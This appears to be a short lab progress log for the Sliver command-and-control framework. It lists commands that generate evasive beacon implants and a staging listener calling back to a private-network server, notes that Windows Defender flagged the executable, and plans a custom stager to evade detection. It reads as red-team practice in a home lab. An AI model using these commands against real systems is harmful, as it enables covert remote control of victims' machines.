ChamberZ1/sliver/progress.md

 Generating a default executable beacon implant to see if Windows Defender will pick it up: ` generate beacon --name exe-beacon --format exe --arch amd64 --http https://192.168.56.1:8443 --c2profile default --evasion` (Tried transferring onto Windows raw .exe file AND base64 encoded - GOT FLAGGED - executables are easily flagged)

+---

+### April 1
+`profiles new beacon --mtls 192.168.56.1 --format shellcode --arch amd64 --evasion default_beacon_profile`

+`stage-listener --url tcp://192.168.56.1:8443 --profile default_beacon_profile`

+### April 4
+creating a custom stager to get the implant on the Windows machine.
+I'm developing the stager on the vm because I've read that it is better to develop code meant for Windows on Windows.